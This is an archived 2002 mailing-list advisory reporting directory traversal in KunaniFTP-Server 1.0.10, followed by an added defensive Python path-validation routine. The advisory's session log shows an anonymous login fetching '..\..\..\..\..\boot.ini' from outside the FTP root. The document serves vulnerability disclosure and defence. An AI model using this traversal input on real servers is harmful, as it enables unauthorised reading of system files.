KunaniFTP-Server v.1.0.10 allows dictionary traversal

From: Zero-X www.lobnan.de Team (zero-xat_private)
Date: Tue Dec 10 2002 - 14:23:24 PST


    KunaniFTP-Server v.1.0.10 allows dictionary traversal:
    
    Some ftp-commands in KunaniFTP-Server allow dictionary traversal.
    
    Example:
    ######################################################
    Verbindung mit server.
    220 Kunani FTP Server Ready  ( www.kunani.com )
    Benutzer (server:(none)): anonymous
    331 Password required for anonymous.
    Kennwort: billsucks
    230 User anonymous logged in.
    Ftp> get ..\..\..\..\..\boot.ini
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Transfer complete.
    Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
    #####################################################
    
    Sorry for my very bad english. *g*
    
    ~~ Zero X, member of www.lobnan.de ~~
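A server-side path check that would refuse the `get ..\..\..\..\..\boot.ini` request shown in the session above. This is an added example, not part of the original post and not KunaniFTP code; the root `C:\ftproot`, the names `resolve_in_root` and `is_allowed`, and the sample requests are assumptions constructed for illustration.

```python
import ntpath  # Windows path semantics; importable on any OS


class PathEscape(Exception):
    """The requested path resolves outside the FTP root."""


def resolve_in_root(root, cwd, requested):
    """Map an FTP path argument to a local path, refusing anything outside root.

    root: local directory being served (assumed, e.g. C:\\ftproot)
    cwd:  the client's virtual working directory, e.g. "\\" or "\\pub"
    """
    # FTP clients may send either separator; treat them the same.
    req = requested.replace("/", "\\")
    # Refuse NUL bytes, drive letters / alternate data streams, and UNC paths.
    if "\x00" in req or ":" in req or req.startswith("\\\\"):
        raise PathEscape(requested)
    # A leading separator is relative to the FTP root, not the drive root.
    base = root if req.startswith("\\") else ntpath.join(root, cwd.strip("\\"))
    candidate = ntpath.normpath(ntpath.join(base, req.lstrip("\\")))
    root_n = ntpath.normpath(root)
    # Compare whole path components: a prefix test would accept C:\ftproot2.
    common = ntpath.commonpath([root_n, candidate])
    if ntpath.normcase(common) != ntpath.normcase(root_n):
        raise PathEscape(requested)
    # String-level check only: junctions or symlinks under root still need a
    # filesystem-level resolve (e.g. os.path.realpath) before the file is opened.
    return candidate


def is_allowed(root, cwd, requested):
    """True if the request stays inside root, False if it is refused."""
    try:
        resolve_in_root(root, cwd, requested)
        return True
    except PathEscape:
        return False


if __name__ == "__main__":
    ROOT = r"C:\ftproot"  # assumed FTP root
    # Constructed sample requests: (virtual cwd, path argument)
    samples = [("\\", r"..\..\..\..\..\boot.ini"), ("\\pub", "../../boot.ini"),
               ("\\", r"..\ftproot2\x.txt"), ("\\", r"pub\..\readme.txt")]
    for cwd, req in samples:
        print(f"{req!r:32} allowed={is_allowed(ROOT, cwd, req)}")
```

The same check belongs on every command that takes a path argument, since the post reports the problem for "some ftp-commands" rather than `get` alone.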
    



    This archive was generated by hypermail 2b30 : Tue Dec 10 2002 - 17:39:36 PST